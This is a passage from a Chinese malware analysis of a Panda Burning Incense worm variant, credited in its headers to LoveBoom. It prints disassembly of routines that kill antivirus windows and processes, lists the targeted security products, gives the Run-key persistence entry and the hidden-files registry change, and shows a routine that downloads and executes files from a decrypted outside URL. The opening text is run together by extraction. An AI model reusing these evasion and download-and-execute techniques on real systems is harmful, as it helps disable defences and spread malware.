net四十七@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:00406681movedx,[ebp+var_B4]CODE:00406687moveax,offsetaIB"卡巴斯基反病毒"CODE:0040668Ccall@System@@LStrPos$qqrvCODE:00406691testeax,eaxCODE:00406693jzshortloc_4066A1CODE:00406695push0lParamCODE:00406697push0wParamCODE:00406699push12hMsgCODE:0040669BpushebxhWndCODE:0040669CcallPostMessageACODE:004066A1CODE:004066A1loc_4066A1:CODEXREF:Thread_Kill_av+3CBjThread_Kill_av+3CBjCODE:004066A1leaeax,[ebp+var_B8]CODE:004066A7movedx,esiCODE:004066A9movecx,65hCODE:004066AEcall@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:004066B3movedx,[ebp+var_B8]CODE:004066B9moveax,offsetaSymantecAntivi"SymantecAntiVirus"CODE:004066BEcall@System@@LStrPos$qqrvCODE:004066C3testeax,eaxCODE:004066C5jzshortloc_4066D3CODE:004066C7push0lParamCODE:004066C9push0wParamCODE:004066CBpush12hMsgCODE:004066CDpushebxhWndCODE:004066CEcallPostMessageACODE:004066D3CODE:004066D3loc_4066D3:CODEXREF:Thread_Kill_av+3FDjThread_Kill_av+3FDjCODE:004066D3leaeax,[ebp+var_BC]CODE:004066D9movedx,esiCODE:004066DBmovecx,65hCODE:004066E0call@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:004066E5movedx,[ebp+var_BC]CODE:004066EBmoveax,offsetaDuba"Duba"CODE:004066F0call@System@@LStrPos$qqrvCODE:004066F5testeax,eaxCODE:004066F7jzshortloc_406705熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net四十八CODE:004066F9push0lParamCODE:004066FBpush0wParamCODE:004066FDpush12hMsgCODE:004066FFpushebxhWndCODE:00406700callPostMessageACODE:00406705CODE:00406705loc_406705:CODEXREF:Thread_Kill_av+42FjThread_Kill_av+42FjCODE:00406705leaeax,[ebp+var_C0]CODE:0040670Bmovedx,esiCODE:0040670Dmovecx,65hCODE:00406712call@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:00406717movedx,[ebp+var_C0]CODE:0040671Dmoveax,offsetaWindowsA"Windows任务管理器"CODE:00406722call@System@@LStrPos$qqrvCODE:00406727testeax,eaxCODE:00406729jzshortloc_406737CODE:0040672Bpush0lParamCODE:0040672Dpush0wParamCODE:0040672Fpush12hMsgCODE:00406731pushebxhWndCODE:00406732callPostMessageACODE:00406737CODE:00406737loc_406737:CODEXREF:Thread_Kill_av+461jThread_Kill_av+461jCODE:00406737leaeax,[ebp+var_C4]CODE:0040673Dmovedx,esiCODE:0040673Fmovecx,65hCODE:00406744call@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:00406749movedx,[ebp+var_C4]CODE:0040674Fmoveax,offsetaQqB"QQ病毒"CODE:00406754call@System@@LStrPos$qqrvCODE:00406759testeax,eaxCODE:0040675Bjzshortloc_406769CODE:0040675Dpush0lParamCODE:0040675Fpush0wParamCODE:00406761push12hMsgCODE:00406763pushebxhWndCODE:00406764callPostMessageACODE:00406769CODE:00406769loc_406769:CODEXREF:Thread_Kill_av+493jThread_Kill_av+493j熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
CODE:00406769 lea eax, [ebp+var_C8]
CODE:0040676F mov edx, esi
CODE:00406771 mov ecx, 65h
CODE:00406776 call @System@@LStrFromArray$qqrr17System@AnsiStringpci
CODE:0040677B mov edx, [ebp+var_C8]
CODE:00406781 mov eax, offset aEsteemProcs ; "esteemprocs"
CODE:00406786 call @System@@LStrPos$qqrv
CODE:0040678B test eax, eax
CODE:0040678D jz short loc_40679B
CODE:0040678F push 0 ; lParam
CODE:00406791 push 0 ; wParam
CODE:00406793 push 12h ; Msg
CODE:00406795 push ebx ; hWnd
CODE:00406796 call PostMessageA
CODE:0040679B
CODE:0040679B loc_40679B: ; CODE XREF: Thread_Kill_av+4C5j
CODE:0040679B lea eax, [ebp+var_CC]
CODE:004067A1 mov edx, esi
CODE:004067A3 mov ecx, 65h
CODE:004067A8 call @System@@LStrFromArray$qqrr17System@AnsiStringpci
CODE:004067AD mov edx, [ebp+var_CC]
CODE:004067B3 mov eax, offset aEpc ; "绿鹰PC"
CODE:004067B8 call @System@@LStrPos$qqrv
CODE:004067BD test eax, eax
CODE:004067BF jz short loc_4067CD
CODE:004067C1 push 0 ; lParam
CODE:004067C3 push 0 ; wParam
CODE:004067C5 push 12h ; Msg
CODE:004067C7 push ebx ; hWnd
CODE:004067C8 call PostMessageA
CODE:004067CD
CODE:004067CD loc_4067CD: ; CODE XREF: Thread_Kill_av+4F7j
CODE:004067CD lea eax, [ebp+var_D0]
CODE:004067D3 mov edx, esi
CODE:004067D5 mov ecx, 65h
CODE:004067DA call @System@@LStrFromArray$qqrr17System@AnsiStringpci
CODE:004067DF mov edx, [ebp+var_D0]
CODE:004067E5 mov eax, offset aI ; "密码防盗"
CODE:004067EA call @System@@LStrPos$qqrv
CODE:004067EF test eax, eax
CODE:004067F1 jz short loc_4067FF
CODE:004067F3 push 0 ; lParam
CODE:004067F5 push 0 ; wParam
CODE:004067F7 push 12h ; Msg
CODE:004067F9 push ebx ; hWnd
CODE:004067FA call PostMessageA
CODE:004067FF
CODE:004067FF loc_4067FF: ; CODE XREF: Thread_Kill_av+529j
CODE:004067FF lea eax, [ebp+var_D4]
CODE:00406805 mov edx, esi
CODE:00406807 mov ecx, 65h
CODE:0040680C call @System@@LStrFromArray$qqrr17System@AnsiStringpci
CODE:00406811 mov edx, [ebp+var_D4]
CODE:00406817 mov eax, offset asc_406DEC ; "噬菌体"
CODE:0040681C call @System@@LStrPos$qqrv
CODE:00406821 test eax, eax
CODE:00406823 jz short loc_406831
CODE:00406825 push 0 ; lParam
CODE:00406827 push 0 ; wParam
CODE:00406829 push 12h ; Msg
CODE:0040682B push ebx ; hWnd
CODE:0040682C call PostMessageA
CODE:00406831
CODE:00406831 loc_406831: ; CODE XREF: Thread_Kill_av+55Bj
CODE:00406831 lea eax, [ebp+var_D8]
CODE:00406837 mov edx, esi
CODE:00406839 mov ecx, 65h
CODE:0040683E call @System@@LStrFromArray$qqrr17System@AnsiStringpci
CODE:00406843 mov edx, [ebp+var_D8]
CODE:00406849 mov eax, offset aAIS ; "木马辅助查找器"
CODE:0040684E call @System@@LStrPos$qqrv
CODE:00406853 test eax, eax
CODE:00406855 jz short loc_406863
CODE:00406857 push 0 ; lParam
CODE:00406859 push 0 ; wParam
CODE:0040685B push 12h ; Msg
CODE:0040685D push ebx ; hWnd
CODE:0040685E call PostMessageA
CODE:00406863
CODE:00406863 loc_406863: ; CODE XREF: Thread_Kill_av+58Dj
CODE:00406863 lea eax, [ebp+var_DC]
CODE:00406869 mov edx, esi
CODE:0040686B mov ecx, 65h
CODE:00406870 call @System@@LStrFromArray$qqrr17System@AnsiStringpci
CODE:00406875 mov edx, [ebp+var_DC]
CODE:0040687B mov eax, offset aSystemSafetyMo ; "SystemSafetyMonitor"
CODE:00406880 call @System@@LStrPos$qqrv
CODE:00406885 test eax, eax
CODE:00406887 jz short loc_406895
CODE:00406889 push 0 ; lParam
CODE:0040688B push 0 ; wParam
CODE:0040688D push 12h ; Msg
CODE:0040688F push ebx ; hWnd
CODE:00406890 call PostMessageA
CODE:00406895
CODE:00406895 loc_406895: ; CODE XREF: Thread_Kill_av+5BFj
CODE:00406895 lea eax, [ebp+var_E0]
CODE:0040689B mov edx, esi
CODE:0040689D mov ecx, 65h
CODE:004068A2 call @System@@LStrFromArray$qqrr17System@AnsiStringpci
CODE:004068A7 mov edx, [ebp+var_E0]
CODE:004068AD mov eax, offset aWrappedGiftKil ; "WrappedgiftKiller"
CODE:004068B2 call @System@@LStrPos$qqrv
CODE:004068B7 test eax, eax
CODE:004068B9 jz short loc_4068C7
CODE:004068BB push 0 ; lParam
CODE:004068BD push 0 ; wParam
CODE:004068BF push 12h ; Msg
CODE:004068C1 push ebx ; hWnd
CODE:004068C2 call PostMessageA
CODE:004068C7
CODE:004068C7 loc_4068C7: ; CODE XREF: Thread_Kill_av+5F1j
CODE:004068C7 lea eax, [ebp+var_E4]
CODE:004068CD mov edx, esi
CODE:004068CF mov ecx, 65h
CODE:004068D4 call @System@@LStrFromArray$qqrr17System@AnsiStringpci
CODE:004068D9 mov edx, [ebp+var_E4]
CODE:004068DF mov eax, offset aWinsockExpert ; "WinsockExpert"
CODE:004068E4 call @System@@LStrPos$qqrv
CODE:004068E9 test eax, eax
CODE:004068EB jz short loc_4068F9
CODE:004068ED push 0 ; lParam
CODE:004068EF push 0 ; wParam
CODE:004068F1 push 12h ; Msg
CODE:004068F3 push ebx ; hWnd
CODE:004068F4 call PostMessageA
CODE:004068F9
CODE:004068F9 loc_4068F9: ; CODE XREF: Thread_Kill_av+623j
CODE:004068F9 lea eax, [ebp+var_E8]
CODE:004068FF mov edx, esi
CODE:00406901 mov ecx, 65h
CODE:00406906 call @System@@LStrFromArray$qqrr17System@AnsiStringpci
CODE:0040690B mov edx, [ebp+var_E8]
CODE:00406911 mov eax, offset aATJ ; "游戏木马检测大师"
CODE:00406916 call @System@@LStrPos$qqrv
CODE:0040691B test eax, eax
CODE:0040691D jz short loc_40692B
CODE:0040691F push 0 ; lParam
CODE:00406921 push 0 ; wParam
CODE:00406923 push 12h ; Msg
CODE:00406925 push ebx ; hWnd
CODE:00406926 call PostMessageA
CODE:0040692B
CODE:0040692B loc_40692B: ; CODE XREF: Thread_Kill_av+655j
CODE:0040692B lea eax, [ebp+var_EC]
CODE:00406931 mov edx, esi
CODE:00406933 mov ecx, 65h
CODE:00406938 call @System@@LStrFromArray$qqrr17System@AnsiStringpci
CODE:0040693D mov edx, [ebp+var_EC]
CODE:00406943 mov eax, offset aMP ; "超级巡警"
CODE:00406948 call @System@@LStrPos$qqrv
CODE:0040694D test eax, eax
CODE:0040694F jz short loc_40695D
CODE:00406951 push 0 ; lParam
CODE:00406953 push 0 ; wParam
CODE:00406955 push 12h ; Msg
CODE:00406957 push ebx ; hWnd
CODE:00406958 call PostMessageA
CODE:0040695D
CODE:0040695D loc_40695D: ; CODE XREF: Thread_Kill_av+687j
CODE:0040695D test ebx, ebx
CODE:0040695F jnz loc_4062F9
CODE:00406965 call GetDesktopWindow
CODE:0040696A mov edi, eax
CODE:0040696C
CODE:0040696C loc_40696C: ; CODE XREF: Thread_Kill_av+7C5j
CODE:0040696C push 0 ; LPCSTR
CODE:0040696E push 0 ; LPCSTR
CODE:00406970 push ebx ; HWND
CODE:00406971 push edi ; HWND
CODE:00406972 call FindWindowExA
CODE:00406977 mov ebx, eax
CODE:00406979 push 0 ; LPCSTR
CODE:0040697B push offset aMsctls_statusb ; "msctls_statusbar32"
CODE:00406980 push 0 ; HWND
CODE:00406982 push ebx ; HWND
CODE:00406983 call FindWindowExA
CODE:00406988 push 0 ; LPCSTR
CODE:0040698A push 0 ; LPCSTR
CODE:0040698C push 0 ; HWND
CODE:0040698E push eax ; HWND
CODE:0040698F call FindWindowExA
CODE:00406994 push 65h ; nMaxCount
CODE:00406996 push esi ; lpString
CODE:00406997 push eax ; hWnd
CODE:00406998 call GetWindowTextA
CODE:0040699D lea eax, [ebp+var_F0]
CODE:004069A3 mov edx, esi
CODE:004069A5 mov ecx, 65h
CODE:004069AA call @System@@LStrFromArray$qqrr17System@AnsiStringpci
CODE:004069AF mov edx, [ebp+var_F0]
CODE:004069B5 mov eax, offset aPjfUstc ; "pjf(ustc)"
CODE:004069BA call @System@@LStrPos$qqrv
CODE:004069BF test eax, eax
CODE:004069C1 jz loc_406A8B
CODE:004069C7 push 0 ; lParam
CODE:004069C9 push 0 ; wParam
CODE:004069CB push 12h ; Msg
CODE:004069CD push ebx ; hWnd
CODE:004069CE call PostMessageA
CODE:004069D3 push 0 ; dwExtraInfo
CODE:004069D5 push 0 ; dwFlags
CODE:004069D7 push 0 ; uMapType
CODE:004069D9 push 11h ; uCode
CODE:004069DB call MapVirtualKeyA
CODE:004069E0 push eax ; bScan
CODE:004069E1 push 11h ; bVk
CODE:004069E3 call keybd_event
CODE:004069E8 push 0 ; dwExtraInfo
CODE:004069EA push 0 ; dwFlags
CODE:004069EC push 0 ; uMapType
CODE:004069EE push 12h ; uCode
CODE:004069F0 call MapVirtualKeyA
CODE:004069F5 push eax ; bScan
CODE:004069F6 push 12h ; bVk
CODE:004069F8 call keybd_event
CODE:004069FD push 0 ; dwExtraInfo
CODE:004069FF push 0 ; dwFlags
CODE:00406A01 push 0 ; uMapType
CODE:00406A03 push 44h ; uCode
CODE:00406A05 call MapVirtualKeyA
CODE:00406A0A push eax ; bScan
CODE:00406A0B push 44h ; bVk
CODE:00406A0D call keybd_event
CODE:00406A12 push 0 ; dwExtraInfo
CODE:00406A14 push 2 ; dwFlags
CODE:00406A16 push 0 ; uMapType
CODE:00406A18 push 44h ; uCode
CODE:00406A1A call MapVirtualKeyA
CODE:00406A1F push eax ; bScan
CODE:00406A20 push 44h ; bVk
CODE:00406A22 call keybd_event
CODE:00406A27 push 0 ; dwExtraInfo
CODE:00406A29 push 2 ; dwFlags
CODE:00406A2B push 0 ; uMapType
CODE:00406A2D push 11h ; uCode
CODE:00406A2F call MapVirtualKeyA
CODE:00406A34 push eax ; bScan
CODE:00406A35 push 11h ; bVk
CODE:00406A37 call keybd_event
CODE:00406A3C push 0 ; dwExtraInfo
CODE:00406A3E push 2 ; dwFlags
CODE:00406A40 push 0 ; uMapType
CODE:00406A42 push 12h ; uCode
CODE:00406A44 call MapVirtualKeyA
CODE:00406A49 push eax ; bScan
CODE:00406A4A push 12h ; bVk
CODE:00406A4C call keybd_event
CODE:00406A51 push offset WindowName ; "IceSword"
CODE:00406A56 push 0 ; lpClassName
CODE:00406A58 call FindWindowA
CODE:00406A5D test eax, eax
CODE:00406A5F jz short loc_406A8B
CODE:00406A61 push 0 ; dwExtraInfo
CODE:00406A63 push 0 ; dwFlags
CODE:00406A65 push 0 ; uMapType
CODE:00406A67 push 0Dh ; uCode
CODE:00406A69 call MapVirtualKeyA
CODE:00406A6E push eax ; bScan
CODE:00406A6F push 0Dh ; bVk
CODE:00406A71 call keybd_event
CODE:00406A76 push 0 ; dwExtraInfo
CODE:00406A78 push 2 ; dwFlags
CODE:00406A7A push 0 ; uMapType
CODE:00406A7C push 0Dh ; uCode
CODE:00406A7E call MapVirtualKeyA
CODE:00406A83 push eax ; bScan
CODE:00406A84 push 0Dh ; bVk
CODE:00406A86 call keybd_event
CODE:00406A8B
CODE:00406A8B loc_406A8B: ; CODE XREF: Thread_Kill_av+6F9j
CODE:00406A8B ; Thread_Kill_av+797j
CODE:00406A8B test ebx, ebx
CODE:00406A8D jnz loc_40696C
CODE:00406A93 mov eax, offset aMcshield_exe ; "Mcshield.exe"
CODE:00406A98 call Kill_Process
CODE:00406A9D mov eax, offset aVstskmgr_exe ; "VsTskMgr.exe"
CODE:00406AA2 call Kill_Process
CODE:00406AA7 mov eax, offset aNaprdmgr_exe ; "naPrdMgr.exe"
CODE:00406AAC call Kill_Process
CODE:00406AB1 mov eax, offset aUpdaterui_exe ; "UpdaterUI.exe"
CODE:00406AB6 call Kill_Process
CODE:00406ABB mov eax, offset aTbmon_exe ; "TBMon.exe"
CODE:00406AC0 call Kill_Process
CODE:00406AC5 mov eax, offset aScan32_exe ; "scan32.exe"
CODE:00406ACA call Kill_Process
CODE:00406ACF mov eax, offset aRavmond_exe ; "Ravmond.exe"
CODE:00406AD4 call Kill_Process
CODE:00406AD9 mov eax, offset aCcenter_exe ; "CCenter.exe"
CODE:00406ADE call Kill_Process
CODE:00406AE3 mov eax, offset aRavtask_exe ; "RavTask.exe"
CODE:00406AE8 call Kill_Process
CODE:00406AED mov eax, offset aRav_exe ; "Rav.exe"
CODE:00406AF2 call Kill_Process
CODE:00406AF7 mov eax, offset aRavmon_exe ; "Ravmon.exe"
CODE:00406AFC call Kill_Process
CODE:00406B01 mov eax, offset aRavmond_exe_0 ; "RavmonD.exe"
CODE:00406B06 call Kill_Process
CODE:00406B0B mov eax, offset aRavstub_exe ; "RavStub.exe"
CODE:00406B10 call Kill_Process
CODE:00406B15 mov eax, offset aKvxp_kxp ; "KVXP.kxp"
CODE:00406B1A call Kill_Process
CODE:00406B1F mov eax, offset aKvmonxp_kxp ; "KvMonXP.kxp"
CODE:00406B24 call Kill_Process
CODE:00406B29 mov eax, offset aKvcenter_kxp ; "KVCenter.kxp"
CODE:00406B2E call Kill_Process
CODE:00406B33 mov eax, offset aKvsrvxp_exe ; "KVSrvXP.exe"
CODE:00406B38 call Kill_Process
CODE:00406B3D mov eax, offset aKregex_exe ; "KRegEx.exe"
CODE:00406B42 call Kill_Process
CODE:00406B47 mov eax, offset aUihost_exe ; "UIHost.exe"
CODE:00406B4C call Kill_Process
CODE:00406B51 mov eax, offset aTrojdie_kxp ; "TrojDie.kxp"
CODE:00406B56 call Kill_Process
CODE:00406B5B mov eax, offset aFrogagent_exe ; "FrogAgent.exe"
CODE:00406B60 call Kill_Process
CODE:00406B65 mov eax, offset aKvxp_kxp ; "KVXP.kxp"
CODE:00406B6A call Kill_Process
CODE:00406B6F mov eax, offset aKvmonxp_kxp ; "KvMonXP.kxp"
CODE:00406B74 call Kill_Process
CODE:00406B79 mov eax, offset aKvcenter_kxp ; "KVCenter.kxp"
CODE:00406B7E call Kill_Process
CODE:00406B83 mov eax, offset aKvsrvxp_exe ; "KVSrvXP.exe"
CODE:00406B88 call Kill_Process
CODE:00406B8D mov eax, offset aKregex_exe ; "KRegEx.exe"
CODE:00406B92 call Kill_Process
CODE:00406B97 mov eax, offset aUihost_exe ; "UIHost.exe"
CODE:00406B9C call Kill_Process
CODE:00406BA1 mov eax, offset aTrojdie_kxp ; "TrojDie.kxp"
CODE:00406BA6 call Kill_Process
CODE:00406BAB mov eax, offset aFrogagent_exe ; "FrogAgent.exe"
CODE:00406BB0 call Kill_Process
CODE:00406BB5 mov eax, offset aLogo1__exe ; "Logo1_.exe"
CODE:00406BBA call Kill_Process
CODE:00406BBF mov eax, offset aLogo_1_exe ; "Logo_1.exe"
CODE:00406BC4 call Kill_Process
CODE:00406BC9 mov eax, offset aRundl132_exe ; "Rundl132.exe"
CODE:00406BCE call Kill_Process
CODE:00406BD3 xor eax, eax
CODE:00406BD5 pop edx
CODE:00406BD6 pop ecx
CODE:00406BD7 pop ecx
CODE:00406BD8 mov fs:[eax], edx
CODE:00406BDB push offset loc_406BF8
CODE:00406BE0
CODE:00406BE0 loc_406BE0: ; CODE XREF: CODE:00406BF6j
CODE:00406BE0 lea eax, [ebp+var_F0]
CODE:00406BE6 mov edx, 22h
CODE:00406BEB call @System@@LStrArrayClr$qqrpvi
CODE:00406BF0 retn
CODE:00406BF0 Thread_Kill_av endp ; sp = 1Ch
CODE:00406BF0
This part is mainly where the virus writes its registry autostart entry so that it runs automatically after every boot. The entry written is:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "svcshare"="%Sysdir%\drivers\spoclsv.exe"
The virus then modifies the following registry value so that the user can no longer display hidden files:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
The virus also carries out the following operations against anti-virus software. It terminates the process behind any window whose title contains one of these strings:
QQKav
QQAV
天网防火墙进程 (Skynet firewall process)
VirusScan
网镖 (Wangbiao)
杀毒 (antivirus)
毒霸 (Duba)
瑞星 (Rising)
江民 (Jiangmin)
黄山IE (Huangshan IE)
超级兔子 (Super Rabbit)
优化大师 (Optimizer Master)
木马克星 (Trojan Killer)
木马清道夫 (Trojan Scavenger)
木馬清道夫 (Trojan Scavenger, traditional-character spelling)
QQ病毒 (QQ virus)
注册表编辑器 (Registry Editor)
系统配置实用程序 (System Configuration Utility)
卡巴斯基反病毒 (Kaspersky Anti-Virus)
Symantec AntiVirus
iDuba
NOD32
超级巡警 (Super Patrol)
esteemprocs
绿鹰PC (Green Eagle PC)
密码防盗 (password anti-theft)
噬菌体 (Bacteriophage)
木马辅助查找器 (Trojan helper finder)
WrappedgiftKiller
WinsockExpert
游戏木马检测大师 (Game Trojan Detection Master)
IceSword
By enumerating the system process list, the virus then terminates the following processes:
Mcshield.exe
VsTskMgr.exe
naPrdMgr.exe
UpdaterUI.exe
TBMon.exe
scan32.exe
Ravmond.exe
CCenter.exe
Rav.exe
Ravmon.exe
RavStub.exe
KVXP.kxp
KvMonXP.kxp
KVCenter.kxp
KVSrvXP.exe
KRegEx.exe
UIHost.exe
TrojDie.kxp
FrogAgent.exe
Logo1_.exe
Logo_1.exe
Rundl132.exe
Next, let's look at the part where the virus downloads other malware:
CODE:0040C478 ; DWORD __stdcall Download(LPVOID)
CODE:0040C478 Download proc near ; DATA XREF: ThreadDownLoad+6o
CODE:0040C478
CODE:0040C478 var_3C = dword ptr -3Ch
CODE:0040C478 var_38 = dword ptr -38h
CODE:0040C478 var_34 = dword ptr -34h
CODE:0040C478 var_30 = dword ptr -30h
CODE:0040C478 var_2C = dword ptr -2Ch
CODE:0040C478 var_28 = dword ptr -28h
CODE:0040C478 var_24 = dword ptr -24h
CODE:0040C478 var_20 = dword ptr -20h
CODE:0040C478 var_1C = dword ptr -1Ch
CODE:0040C478 var_18 = dword ptr -18h
CODE:0040C478 var_14 = dword ptr -14h
CODE:0040C478 var_10 = dword ptr -10h
CODE:0040C478 var_C = dword ptr -0Ch
CODE:0040C478 var_8 = dword ptr -8
CODE:0040C478 var_4 = dword ptr -4
CODE:0040C478
CODE:0040C478 push ebp
CODE:0040C479 mov ebp, esp
CODE:0040C47B mov ecx, 7
CODE:0040C480
CODE:0040C480 loc_40C480: ; CODE XREF: Download+Dj
CODE:0040C480 push 0
CODE:0040C482 push 0
CODE:0040C484 dec ecx
CODE:0040C485 jnz short loc_40C480
CODE:0040C487 push ecx
CODE:0040C488 push ebx
CODE:0040C489 push esi
CODE:0040C48A push edi
CODE:0040C48B xor eax, eax
CODE:0040C48D push ebp
CODE:0040C48E push offset j_@System@@HandleFinally$qqrv_34
CODE:0040C493 push dword ptr fs:[eax]
CODE:0040C496 mov fs:[eax], esp
CODE:0040C499 xor eax, eax
CODE:0040C49B push ebp
CODE:0040C49C push offset loc_40C688
CODE:0040C4A1 push dword ptr fs:[eax]
CODE:0040C4A4 mov fs:[eax], esp
CODE:0040C4A7 lea edx, [ebp+var_C]
CODE:0040C4AA mov eax, offset aUup2__w ; "`uup2..w"
CODE:0040C4AF call Decrypt_01 ; decrypts to http://www.ctv163.com/wuhan/down.txt
CODE:0040C4B4 mov eax, [ebp+var_C]
CODE:0040C4B7 call @System@@LStrToPChar$qqrx17System@AnsiString
CODE:0040C4BC lea edx, [ebp+var_8]
CODE:0040C4BF call OpenUrl ; opens the web page above
CODE:0040C4C4 mov eax, [ebp+var_8]
CODE:0040C4C7 mov edx, offset aQq ; "QQ"
CODE:0040C4CC call @System@@LStrCmp$qqrv
CODE:0040C4D1 jnz short loc_40C4E0
CODE:0040C4D3 xor eax, eax
CODE:0040C4D5 pop edx
CODE:0040C4D6 pop ecx
CODE:0040C4D7 pop ecx
CODE:0040C4D8 mov fs:[eax], edx
CODE:0040C4DB jmp loc_40C692
CODE:0040C4E0
CODE:0040C4E0
CODE:0040C4E0 loc_40C4E0: ; CODE XREF: Download+59j
CODE:0040C4E0 ; Download+1F8j
CODE:0040C4E0 mov edx, [ebp+var_8]
CODE:0040C4E3 mov eax, offset asc_40C700 ; "\r\n"
CODE:0040C4E8 call @System@@LStrPos$qqrv
CODE:0040C4ED test eax, eax
CODE:0040C4EF jle loc_40C5CE
CODE:0040C4F5 lea eax, [ebp+var_4]
CODE:0040C4F8 push eax
CODE:0040C4F9 mov edx, [ebp+var_8]
CODE:0040C4FC mov eax, offset asc_40C700 ; "\r\n"
CODE:0040C501 call @System@@LStrPos$qqrv
CODE:0040C506 mov ecx, eax
CODE:0040C508 dec ecx
CODE:0040C509 mov edx, 1
CODE:0040C50E mov eax, [ebp+var_8]
CODE:0040C511 call @System@@LStrCopy$qqrv
CODE:0040C516 lea eax, [ebp+var_8]
CODE:0040C519 push eax
CODE:0040C51A mov edx, [ebp+var_8]
CODE:0040C51D mov eax, offset asc_40C700 ; "\r\n"
CODE:0040C522 call @System@@LStrPos$qqrv
CODE:0040C527 add eax, 2
CODE:0040C52A push eax
CODE:0040C52B mov eax, [ebp+var_8]
CODE:0040C52E call unKnow
CODE:0040C533 mov ecx, eax
CODE:0040C535 mov eax, [ebp+var_8]
CODE:0040C538 pop edx
CODE:0040C539 call @System@@LStrCopy$qqrv
CODE:0040C53E push 0 ; LPBINDSTATUSCALLBACK
CODE:0040C540 push 0 ; DWORD
CODE:0040C542 lea eax, [ebp+var_10]
CODE:0040C545 call sub_40C118
CODE:0040C54A lea eax, [ebp+var_10]
CODE:0040C54D push eax
CODE:0040C54E mov eax, [ebp+var_4]
CODE:0040C551 call @System@@LStrToPChar$qqrx17System@AnsiString
CODE:0040C556 mov ebx, eax
CODE:0040C558 mov edx, ebx
CODE:0040C55A lea eax, [ebp+var_18]
CODE:0040C55D call @System@@LStrFromPChar$qqrr17System@AnsiStringpc
CODE:0040C562 mov eax, [ebp+var_18]
CODE:0040C565 lea edx, [ebp+var_14]
CODE:0040C568 call TrimExpr
CODE:0040C56D mov edx, [ebp+var_14]
CODE:0040C570 pop eax
CODE:0040C571 call @System@@LStrCat$qqrv
CODE:0040C576 mov eax, [ebp+var_10]
CODE:0040C579 call @System@@LStrToPChar$qqrx17System@AnsiString
CODE:0040C57E push eax ; LPCSTR
CODE:0040C57F push ebx ; LPCSTR
CODE:0040C580 push 0 ; LPUNKNOWN
CODE:0040C582 call URLDownloadToFileA
CODE:0040C587 push 0 ; uCmdShow
CODE:0040C589 lea eax, [ebp+var_1C]
CODE:0040C58C call sub_40C118
CODE:0040C591 lea eax, [ebp+var_1C]
CODE:0040C594 push eax
CODE:0040C595 mov eax, [ebp+var_4]
CODE:0040C598 call @System@@LStrToPChar$qqrx17System@AnsiString
CODE:0040C59D mov edx, eax
CODE:0040C59F lea eax, [ebp+var_24]
CODE:0040C5A2 call @System@@LStrFromPChar$qqrr17System@AnsiStringpc
CODE:0040C5A7 mov eax, [ebp+var_24]
CODE:0040C5AA lea edx, [ebp+var_20]
CODE:0040C5AD call TrimExpr
CODE:0040C5B2 mov edx, [ebp+var_20]
CODE:0040C5B5 pop eax
CODE:0040C5B6 call @System@@LStrCat$qqrv
CODE:0040C5BB mov eax, [ebp+var_1C]
CODE:0040C5BE call @System@@LStrToPChar$qqrx17System@AnsiString
CODE:0040C5C3 push eax ; lpCmdLine
CODE:0040C5C4 call WinExec
CODE:0040C5C9 jmp loc_40C66C
CODE:0040C5CE
CODE:0040C5CE
CODE:0040C5CE loc_40C5CE: ; CODE XREF: Download+77j
CODE:0040C5CE lea eax, [ebp+var_4]
CODE:0040C5D1 mov edx, [ebp+var_8]
CODE:0040C5D4 call @System@@LStrLAsg$qqrpvpxv
CODE:0040C5D9 push 0 ; LPBINDSTATUSCALLBACK
CODE:0040C5DB push 0 ; DWORD
CODE:0040C5DD lea eax, [ebp+var_28]
CODE:0040C5E0 call sub_40C118
CODE:0040C5E5 lea eax, [ebp+var_28]
CODE:0040C5E8 push eax
CODE:0040C5E9 mov eax, [ebp+var_4]
CODE:0040C5EC call @System@@LStrToPChar$qqrx17System@AnsiString
CODE:0040C5F1 mov ebx, eax
CODE:0040C5F3 mov edx, ebx
CODE:0040C5F5 lea eax, [ebp+var_30]
CODE:0040C5F8 call @System@@LStrFromPChar$qqrr17System@AnsiStringpc
CODE:0040C5FD mov eax, [ebp+var_30]
CODE:0040C600 lea edx, [ebp+var_2C]
CODE:0040C603 call TrimExpr
CODE:0040C608 mov edx, [ebp+var_2C]
CODE:0040C60B pop eax
CODE:0040C60C call @System@@LStrCat$qqrv
CODE:0040C611 mov eax, [ebp+var_28]
CODE:0040C614 call @System@@LStrToPChar$qqrx17System@AnsiString
CODE:0040C619 push eax ; LPCSTR
CODE:0040C61A push ebx ; LPCSTR
CODE:0040C61B push 0 ; LPUNKNOWN
CODE:0040C61D call URLDownloadToFileA
CODE:0040C622 push 0 ; uCmdShow
CODE:0040C624 lea eax, [ebp+var_34]
CODE:0040C627 call sub_40C118
CODE:0040C62C lea eax, [ebp+var_34]
CODE:0040C62F push eax
CODE:0040C630 mov eax, [ebp+var_4]
CODE:0040C633 call @System@@LStrToPChar$qqrx17System@AnsiString
CODE:0040C638 mov edx, eax
CODE:0040C63A lea eax, [ebp+var_3C]
CODE:0040C63D call @System@@LStrFromPChar$qqrr17System@AnsiStringpc
CODE:0040C642 mov eax, [ebp+var_3C]
CODE:0040C645 lea edx, [ebp+var_38]
CODE:0040C648 call TrimExpr
CODE:0040C64D mov edx, [ebp+var_38]
CODE:0040C650 pop eax
CODE:0040C651 call @System@@LStrCat$qqrv
CODE:0040C656 mov eax, [ebp+var_34]
CODE:0040C659 call @System@@LStrToPChar$qqrx17System@AnsiString
CODE:0040C65E push eax ; lpCmdLine
CODE:0040C65F call WinExec
CODE:0040C664 lea eax, [ebp+var_8]
CODE:0040C667 call @System@@LStrClr$qqrpv
CODE:0040C66C
CODE:0040C66C loc_40C66C: ; CODE XREF: Download+151j
CODE:0040C66C cmp [ebp+var_8], 0
CODE:0040C670 jnz loc_40C4E0
CODE:0040C676 lea eax, [ebp+var_4]
CODE:0040C679 call @System@@LStrClr$qqrpv
CODE:0040C67E xor eax, eax
CODE:0040C680 pop edx
CODE:0040C681 pop ecx
CODE:0040C682 pop ecx
CODE:0040C683 mov fs:[eax], edx
CODE:0040C686 jmp short loc_40C692
CODE:0040C688
CODE:0040C688
